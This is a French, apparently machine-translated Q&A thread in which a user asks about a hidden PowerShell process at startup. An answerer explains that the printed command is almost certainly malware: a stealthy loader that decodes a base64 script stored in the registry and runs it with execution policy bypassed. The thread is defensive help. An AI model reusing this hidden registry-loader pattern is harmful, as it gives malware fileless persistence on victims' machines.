Question Processus PowerShell.exe aléatoire?


J'ai remarqué il y a quelques jours dans le Gestionnaire des tâches que j'ai un processus powershell.exe en cours d'exécution. Quand je suis allé à msconfig, il a une très longue commande. C'est ici:

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.Get.String([Convert]::FromBase64string((gp'HKCU:\Software\Classes\SAJELFZIXHQTV').ADUXJH)));

C’est vraiment bizarre parce qu’aujourd’hui un processus aléatoire avec lequel j’ai eu des problèmes est apparu (peut-être qu’il n’est pas lié à cela, mais juste en disant) qui est un virus et a essayé de télécharger un pilote non sécurisé, comme Windows, sur mon PC. Quelqu'un pourrait-il me parler de ce processus PowerShell? Il démarre au démarrage et fonctionne toujours. Encore une fois, j'espère que je ne semble pas ignorant, peut-être que c'est juste un processus de démarrage normal.


4
2017-09-19 21:18


origine


Est-ce que cela peut être dangereux? Si oui, comment puis-je m'en débarrasser, et si ce n'est pas le cas, ce processus est-il important pour Windows afin que je puisse le faire cesser au démarrage? - VoLtury Bey


Réponses:


Ceci est presque certainement malveillant.

Disons le démonter. Il appelle Windows PowerShell (un interpréteur de commandes légitime et très utile) sans personnalisation de l'utilisateur (-noprofile) dans une fenêtre cachée (-windowstyle hidden), permettant à la session PowerShell d’exécuter des scripts quelle que soit la stratégie système (-executionpolicy bypass). Il exécute alors cette commande:

iex ([Text.Encoding]::ASCII.Get.String([Convert]::FromBase64string((gp'HKCU:\Software\Classes\SAJELFZIXHQTV').ADUXJH)))

gp veux dire Get-ItemProperty, qui peut être utilisé pour récupérer les valeurs des clés de Registre, et c’est ce qu’il fait ici. Apparemment, il y a une clé appelée SAJELFZIXHQTV dans votre utilisateur actuel Software\Classes clé. Cette clé a une valeur appelée ADUXJH, les données dans lesquelles est ce que gp récupère. Ces données (évidemment une chaîne) sont alors Base64-décodé dans un tableau d'octets (FromBase64String). Ces octets sont ensuite interprétés comme du texte ASCII (ASCII.GetString). Bizarrement, il y a un point supplémentaire dans l'original, ce qui devrait provoquer une erreur car le ASCII objet n'a aucun membre appelé Get. Étant donné que le processus reste en place, je pense que le point supplémentaire n'est qu'une erreur de transcription.

Si cette erreur n’y était pas, le texte résultant serait appelé en tant que commande PowerShell (iex). En bref, cette commande est conçue pour charger un script encodé à partir du registre et l'exécuter. Pour voir exactement ce qu’il exécute, copiez la commande PowerShell ci-dessus moins le iex et avec le point supplémentaire supprimé dans une invite PowerShell et l'exécuter. Il imprimera la commande qui serait invoquée. Ce ne sera certainement pas bénin.

Vous pouvez arrêter cette entrée de démarrer automatiquement avec le Autoruns outil. Cependant, il est préférable de nettoyer votre machine, car elle est probablement infectée. S'il te plait regarde Comment puis-je supprimer les logiciels espions, logiciels malveillants, logiciels publicitaires, virus, chevaux de Troie ou rootkits malveillants de mon PC?


9
2017-09-19 21:45



Donc, bref: c'est une mauvaise chose, non? Pouvez-vous simplement expliquer ce que cette chose fait de manière plus simple si cela est possible? Je suis un peu inquiet en ce moment, car j'ai eu ce processus pendant une longue période maintenant et rien n'est encore arrivé. - VoLtury Bey
@VoLturyBey Oui, c'est probablement une mauvaise chose. Il charge une commande codée à partir du registre et l'exécute en arrière-plan, ce qui est une tâche modérément sommaire. Je ne peux pas savoir exactement ce que fait cette commande car elle est seulement présente dans votre registre. Pourriez-vous exécuter la commande PowerShell I incluse (moins le iexet avec le point supplémentaire fixe) s'il vous plaît? Cela nous montrera ce qu'il fait. - Ben N
Peut-il nuire à mon PC si je le fais? - VoLtury Bey
@VoLturyBey Sans le iex, il ne fera que montrer ce qu'il a déjà fonctionné. Cela ne peut pas vous nuire, mais ce que vous faites est très probablement malveillant. - Ben N
@VoLturyBey Si c’était moi, je nettoyerais mon ordinateur très bientôt, mais si vous ne vous inquiétez pas de ce qui a déjà été fait, alors je ne m'attendrais pas à ce que quelque chose change en quelques jours. - Ben N